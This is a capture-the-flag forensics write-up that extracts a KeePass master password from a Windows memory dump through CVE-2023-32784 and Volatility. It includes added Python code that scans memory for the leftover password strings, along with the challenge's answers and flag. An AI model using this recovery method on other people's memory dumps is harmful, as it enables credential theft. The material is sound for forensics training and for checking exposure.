Description
Find the password of the zip file
```
➜ secretZip ls -la
total 6489204
drwxrwxr-x 2 thib thib 4096 juin 24 15:44 .
drwxrwxr-x 8 thib thib 4096 juin 24 23:42 ..
-rwx--x--x 1 thib thib 6357400688 juin 20 01:00 image.dmp
-rw-rw-r-- 1 thib thib 269 juin 20 00:49 important.zip
```
Write up
Looking at the list of files, you’d think you’d have to find the zip password in the image.dmp file.
```
➜ secretZip file image.dmp
image.dmp: ELF 64-bit LSB core file, x86-64, version 1 (SYSV)
```
This is a memory dump of a running machine, but which dump format exactly? The ELF notes tell us who produced it.
```
➜ secretZip readelf -n image.dmp
Displaying notes found at file offset 0x00000548 with length 0x00006728:
Owner Data size Description
VBCORE 0x00000018 Unknown note type: (0x00000b00)
description data: de c0 1a c0 05 00 01 00 18 00 00 00 26 00 01 06 5e 57 02 00 03 00 00 00
VBCPU 0x00002240 Unknown note type: (0x00000b01)
```
It’s a VirtualBox memory dump: the VBCORE and VBCPU note owners are VirtualBox-specific.
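To see what readelf is reporting, here is an added example (my own code, not from the write-up and not part of VirtualBox or Volatility) that walks the PT_NOTE segments of an ELF64 core, classifies the dump as a VirtualBox core when both the VBCORE and VBCPU owners are present, and decodes the 24 description bytes readelf printed above. The decoder's field layout (six little-endian u32: magic, format version, size, VirtualBox version, revision, CPU count) is my recollection of VirtualBox's dbgfcorefmt.h and is an assumption to verify against the header; the ELF core the script builds for itself is constructed inline and only contains a note segment.

```python
import struct

PT_NOTE = 4        # program header type of a note segment
ET_CORE = 4        # e_type of a core file
EM_X86_64 = 62

# Note owner/type pairs that readelf printed for this dump: VirtualBox-specific.
VBOX_NOTE_TYPES = {"VBCORE": 0x0B00, "VBCPU": 0x0B01}

# VBCORE description bytes exactly as readelf showed them on the dump.
VBCORE_DESC = bytes.fromhex(
    "de c0 1a c0 05 00 01 00 18 00 00 00 26 00 01 06 5e 57 02 00 03 00 00 00"
)


def parse_elf_notes(data):
    """Return (e_type, [(owner, type, desc), ...]) from every PT_NOTE segment of a LE ELF64."""
    if data[:4] != b"\x7fELF" or data[4] != 2 or data[5] != 1:
        raise ValueError("not a little-endian ELF64 file")
    e_type = struct.unpack_from("<H", data, 0x10)[0]
    e_phoff = struct.unpack_from("<Q", data, 0x20)[0]
    e_phentsize, e_phnum = struct.unpack_from("<HH", data, 0x36)
    notes = []
    for i in range(e_phnum):
        p_type, _flags, p_offset, _va, _pa, p_filesz = struct.unpack_from(
            "<IIQQQQ", data, e_phoff + i * e_phentsize)
        if p_type != PT_NOTE:
            continue
        seg = data[p_offset:p_offset + p_filesz]
        pos = 0
        while pos + 12 <= len(seg):
            namesz, descsz, ntype = struct.unpack_from("<III", seg, pos)
            pos += 12
            owner = seg[pos:pos + namesz].rstrip(b"\0").decode("ascii", "replace")
            pos += (namesz + 3) & ~3        # name and descriptor are 4-byte aligned
            desc = seg[pos:pos + descsz]
            pos += (descsz + 3) & ~3
            notes.append((owner, ntype, desc))
    return e_type, notes


def classify_dump(data):
    """'virtualbox-core', 'core' or 'not-core' from e_type and the note owners."""
    e_type, notes = parse_elf_notes(data)
    if e_type != ET_CORE:
        return "not-core"
    seen = {(owner, ntype) for owner, ntype, _ in notes}
    if all((o, t) in seen for o, t in VBOX_NOTE_TYPES.items()):
        return "virtualbox-core"
    return "core"


def decode_vbcore(desc):
    """ASSUMPTION: six u32 fields (magic, fmt version, size, VBox version, revision,
    CPU count), as I recall VirtualBox's DBGFCOREDESCRIPTOR; verify before relying on it."""
    magic, fmt, size, version, revision, cpus = struct.unpack("<6I", desc[:24])
    if magic != 0xC01AC0DE or size != 24:
        raise ValueError("unexpected VBCORE descriptor")
    return {
        "format_version": fmt,
        "vbox_version": "%d.%d.%d" % (version >> 24, (version >> 16) & 0xFF, version & 0xFFFF),
        "revision": revision,
        "cpus": cpus,
    }


def _note(owner, ntype, desc):
    name = owner.encode() + b"\0"
    pad = lambda b: b + b"\0" * (-len(b) % 4)
    return struct.pack("<III", len(name), len(desc), ntype) + pad(name) + pad(desc)


def build_sample_core():
    """CONSTRUCTED minimal ELF64 core: one PT_NOTE segment holding a VBCORE note
    (payload from the page) and a VBCPU note (zero filler; only owner/type matter)."""
    notes = _note("VBCORE", 0x0B00, VBCORE_DESC) + _note("VBCPU", 0x0B01, bytes(16))
    e_ident = b"\x7fELF" + bytes([2, 1, 1, 0]) + bytes(8)
    ehdr = e_ident + struct.pack("<HHIQQQIHHHHHH", ET_CORE, EM_X86_64, 1, 0,
                                 64, 0, 0, 64, 56, 1, 0, 0, 0)
    phdr = struct.pack("<IIQQQQQQ", PT_NOTE, 4, 64 + 56, 0, 0, len(notes), len(notes), 4)
    return ehdr + phdr + notes


if __name__ == "__main__":
    core = build_sample_core()
    print(classify_dump(core))
    for owner, ntype, desc in parse_elf_notes(core)[1]:
        print("%-8s type=0x%04x size=0x%x" % (owner, ntype, len(desc)))
    print(decode_vbcore(VBCORE_DESC))
```

Run against the real image.dmp (reading the first few KiB is enough, since the note segment sits at offset 0x548) the classifier reports a VirtualBox core, and the decoder, if the assumed layout holds, turns the description bytes into the VirtualBox build and CPU count of the VM that produced the dump, which is the kind of provenance a forensic report should record before any Volatility profile is chosen.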
We can use volatility to find the OS and version associated with this dump.
```
➜ secretZip vol2 -f image.dmp imageinfo
Volatility Foundation Volatility Framework 2.6.1
INFO : volatility.debug : Determining profile based on KDBG search...
Suggested Profile(s) : Win7SP1x86_23418, Win7SP0x86, Win7SP1x86_24000, Win7SP1x86
...
```
That’s good news, because we won’t need to build a profile. Just use one of the provided ones. We can look at the processes that were running and we should find something related to a zip.
```
➜ secretZip vol2 --profile=Win7SP0x86 -f image.dmp pslist
Volatility Foundation Volatility Framework 2.6.1
Offset(V) Name PID PPID Thds Hnds Sess Wow64 Start Exit
---------- -------------------- ------ ------ ------ -------- ------ ------ ------------------------------ ------------------------------
0x84440a68 System 4 0 89 500 ------ 0 2023-06-19 22:52:52 UTC+0000
0x8557cc00 smss.exe 280 4 2 31 ------ 0 2023-06-19 22:52:52 UTC+0000
0x86d10030 csrss.exe 360 344 9 351 0 0 2023-06-19 22:52:53 UTC+0000
0x8550ad40 wininit.exe 412 344 3 80 0 0 2023-06-19 22:52:53 UTC+0000
0x8550a5b8 csrss.exe 420 404 11 172 1 0 2023-06-19 22:52:53 UTC+0000
0x86ddec90 winlogon.exe 476 404 4 113 1 0 2023-06-19 22:52:53 UTC+0000
0x86803d40 services.exe 512 412 8 191 0 0 2023-06-19 22:52:53 UTC+0000
0x86801c08 lsass.exe 528 412 7 541 0 0 2023-06-19 22:52:53 UTC+0000
0x8681cd40 lsm.exe 536 412 10 146 0 0 2023-06-19 22:52:53 UTC+0000
0x87003430 svchost.exe 652 512 10 351 0 0 2023-06-19 22:52:55 UTC+0000
0x8705f030 VBoxService.ex 716 512 14 127 0 0 2023-06-19 22:52:55 UTC+0000
0x87085878 svchost.exe 784 512 7 246 0 0 2023-06-19 22:52:55 UTC+0000
0x870af8b8 svchost.exe 856 512 21 474 0 0 2023-06-19 22:52:55 UTC+0000
0x870d4030 svchost.exe 908 512 13 304 0 0 2023-06-19 22:52:55 UTC+0000
0x870e2030 svchost.exe 944 512 33 902 0 0 2023-06-19 22:52:55 UTC+0000
0x870f65e8 audiodg.exe 1032 856 6 121 0 0 2023-06-19 22:52:55 UTC+0000
0x86834960 svchost.exe 1080 512 17 447 0 0 2023-06-19 22:52:55 UTC+0000
0x8711fd40 svchost.exe 1180 512 17 366 0 0 2023-06-19 22:52:55 UTC+0000
0x871e96f0 spoolsv.exe 1364 512 13 274 0 0 2023-06-19 22:52:55 UTC+0000
0x872172f0 svchost.exe 1392 512 19 313 0 0 2023-06-19 22:52:55 UTC+0000
0x8726b940 svchost.exe 1496 512 15 258 0 0 2023-06-19 22:52:55 UTC+0000
0x8767a030 sppsvc.exe 1480 512 6 145 0 0 2023-06-19 22:54:53 UTC+0000
0x8710a030 svchost.exe 680 512 12 305 0 0 2023-06-19 22:54:53 UTC+0000
0x844e89a0 SearchIndexer. 1964 512 12 549 0 0 2023-06-19 22:54:53 UTC+0000
0x8564b730 taskhost.exe 1548 512 9 159 1 0 2023-06-19 22:55:42 UTC+0000
0x871a64a0 dwm.exe 1924 908 4 56 1 0 2023-06-19 22:55:42 UTC+0000
0x85435780 explorer.exe 1872 1656 22 751 1 0 2023-06-19 22:55:42 UTC+0000
0x86f4cd40 VBoxTray.exe 616 1872 15 147 1 0 2023-06-19 22:55:42 UTC+0000
0x85476d40 wmpnetwk.exe 2412 512 11 211 0 0 2023-06-19 22:55:48 UTC+0000
0x84592630 KeePass.exe 2864 1872 11 344 1 0 2023-06-19 22:55:58 UTC+0000
0x87115030 WmiPrvSE.exe 3216 652 7 116 0 0 2023-06-19 22:56:58 UTC+0000
```
In the end there is no archiver process in the list, but there is a KeePass instance (KeePass.exe, PID 2864) running on the machine. Logically, we can suppose that there is an associated .kdbx file.
```
➜ secretZip vol2 --profile=Win7SP0x86 -f image.dmp filescan | grep .kdbx
Volatility Foundation Volatility Framework 2.6.1
0x000000007ccd6a18 8 0 R--rwd \Device\HarddiskVolume2\Users\Udriano\Documents\secret.kdbx
```
Indeed, we find a secret.kdbx file. Let’s try to dump it.
```
➜ secretZip vol2 --profile=Win7SP0x86 -f image.dmp dumpfiles -Q 0x000000007ccd6a18 -D .
Volatility Foundation Volatility Framework 2.6.1
DataSectionObject 0x7ccd6a18 None \Device\HarddiskVolume2\Users\Udriano\Documents\secret.kdbx
➜ secretZip file file.None.0x878d6340.dat
file.None.0x878d6340.dat: Keepass password database 2.x KDBX
```
That’s it, we’ve got our KeePass database, which probably contains the zip password. But we’re missing the master password to open it…
We can look in the memory of the KeePass process; the password may be there in clear text.
```
➜ secretZip vol2 --profile=Win7SP0x86 -f image.dmp memdump -p 2864 -D .
Volatility Foundation Volatility Framework 2.6.1
************************************************************************
Writing KeePass.exe [ 2864] to 2864.dmp
```
```
➜ secretZip cat 2864.dmp | grep Password
<String>
<Key>Notes</Key>
<Value></Value>
</String>
<String>
<Key>Password</Key>
<Value Protected="True">/fLnJG9NXT4o5/0DRVarXVGJcBA=</Value>
</String>
<String>
<Key>Title</Key>
<Value>secret zip</Value>
</String>
<String>
<Key>URL</Key>
<Value></Value>
</String>
<String>
<Key>UserName</Key>
<Value></Value>
</String>
```
There’s some very interesting stuff, but no trace of the master password. We do, however, have confirmation that the zip password is present in the KeePass database (an entry titled "secret zip" with a protected Password field).
It’s quite reassuring that the entry password is not stored in clear text, but it’s not good news for us…
I did some research to find out how to recover this password and came across a Volatility plugin that exploits a vulnerability (CVE-2023-32784) to recover the master password.
```
In KeePass 2.x before 2.54, it is possible to recover the cleartext master password from a memory dump, even when a workspace is locked or no longer running. The memory dump can be a KeePass process dump, swap file (pagefile.sys), hibernation file (hiberfil.sys), or RAM dump of the entire system. The first character cannot be recovered.
```
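To understand why the plugin output grows one character per line and why the first character is never recovered, here is an added example of my own (not the Volatility plugin's code and not KeePass code). It assumes the mechanism described in the CVE advisory: in KeePass 2.x before 2.54 the masked password box left, for every keystroke after the first, a managed UTF-16 string of n-1 mask characters (U+25CF, 0xCF 0x25 little-endian) followed by the n-th typed character. The dump it scans is constructed inline around the master password from this write-up; `leaks_master_password` is the check a defender can run on a dump of their own KeePass process to confirm whether the build they run is affected.

```python
import random
import re

BULLET = "\u25cf"                         # mask character drawn in the KeePass password box
BULLET_LE = BULLET.encode("utf-16-le")    # b"\xcf\x25" inside a .NET (UTF-16LE) process
# A run of mask characters followed by exactly one UTF-16 code unit.
LEFTOVER_RE = re.compile(rb"((?:\xcf\x25)+)(..)", re.DOTALL)


def build_sample_dump(password, seed=7):
    """CONSTRUCTED stand-in for a KeePass < 2.54 process dump (assumption: the leftover
    layout described in the CVE). Keystroke n (n >= 2) leaves (n-1) bullets + the n-th
    character; keystroke 1 leaves only a bare character, which no scan can single out."""
    rng = random.Random(seed)
    noise = lambda: bytes(rng.choices(range(0x20, 0x7F), k=rng.randint(8, 64)))  # never 0xcf
    leftovers = [(BULLET * i + password[i]).encode("utf-16-le") for i in range(1, len(password))]
    rng.shuffle(leftovers)                         # heap order is not typing order
    parts = []
    for s in leftovers:
        parts += [noise(), s]
    parts += [noise(), (BULLET * 5).encode("utf-16-le")]  # a fully masked field: must be ignored
    return b"".join(parts)


def scan_leftovers(dump):
    """Map 0-based password position -> set of candidate characters seen after a bullet run."""
    found = {}
    for m in LEFTOVER_RE.finditer(dump):
        n_bullets = len(m.group(1)) // 2
        ch = m.group(2).decode("utf-16-le", errors="replace")
        if ch == BULLET or not (ch.isascii() and ch.isprintable()):
            continue                               # bullet-only string or non-text bytes
        found.setdefault(n_bullets, set()).add(ch)
    return found


def reconstruct(found):
    """Plugin-style rendering: '?' where nothing was seen, {ab} where several chars were."""
    if not found:
        return ""
    out = ["?"]                                    # position 0 never leaks
    for i in range(1, max(found) + 1):
        cands = sorted(found.get(i, ()))
        if len(cands) == 1:
            out.append(cands[0])
        elif cands:
            out.append("{" + "".join(cands) + "}")
        else:
            out.append("?")
    return "".join(out)


def leaks_master_password(dump):
    """Defender check: True if the dump contains the CVE-2023-32784 leftover pattern."""
    return bool(scan_leftovers(dump))


if __name__ == "__main__":
    dump = build_sample_dump("H3r3IsMySimpl3P@ssw0rd")   # master password from the write-up
    print(leaks_master_password(dump))
    print(reconstruct(scan_leftovers(dump)))
```

The scan only ever sees strings with at least one bullet, so position 0 is structurally unrecoverable, exactly what the advisory states and what the plugin's table shows by starting at "3". Where the same position yields several candidates (a corrected typo, a second password typed in the same box), the curly-brace rendering keeps all of them instead of guessing. The fix on the defender side is the one the advisory implies: run KeePass 2.54 or later and treat any process or full-memory dump of an older build as containing the master password in clear.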
So I installed the plugin in my Volatility 3 setup and ran it with the KeePass PID.
```
➜ secretZip vol3 -f image.dmp windows.keepass --pid 2864
Offset Size Constructed_Password
0x1f2e000 0x1000 3
0x1f2f000 0x1000 3r
0x1f31000 0x1000 3r3
0x1f32000 0x1000 3r3I
0x1f32000 0x1000 3r3Is
0x1f32000 0x1000 3r3IsM
0x1f33000 0x1000 3r3IsMy
0x1f33000 0x1000 3r3IsMyS
0x1f34000 0x1000 3r3IsMySi
0x1f34000 0x1000 3r3IsMySim
0x1f35000 0x1000 3r3IsMySimp
0x1f35000 0x1000 3r3IsMySimpl
0x1f37000 0x1000 3r3IsMySimpl3
0x1f38000 0x1000 3r3IsMySimpl3P
0x1f4f000 0x1000 3r3IsMySimpl3P@
0x1f4f000 0x1000 3r3IsMySimpl3P@s
0x1f50000 0x2000 3r3IsMySimpl3P@ss
0x1f50000 0x2000 3r3IsMySimpl3P@ssw
0x1f50000 0x2000 3r3IsMySimpl3P@ssw0
0x1f50000 0x2000 3r3IsMySimpl3P@ssw0r
0x1f50000 0x2000 3r3IsMySimpl3P@ssw0rd
0x1f52000 0x1000 3r3IsMySimpl3P@ssw0rd
0x6a3f1000 0x1000 3r3IsMySimpl3P@ssw0rd
```
As the CVE description tells us, the first character is missing. We can easily guess that it’s an H.
Master Password : H3r3IsMySimpl3P@ssw0rd
Now all we need to do is open the KeePass database, retrieve the zip password, decompress the archive and retrieve the flag.
Zip Password : nljVikExMW0yebj3KAMf
```
➜ secretZip unzip important.zip
Archive: important.zip
[important.zip] secret.txt password:
inflating: secret.txt
➜ secretZip cat secret.txt
Well played !
Here is the flag : MCTF{K33P@ss_M@st3r_P@ssw0rd_Dump3r}
```
Flag
MCTF{K33P@ss_M@st3r_P@ssw0rd_Dump3r}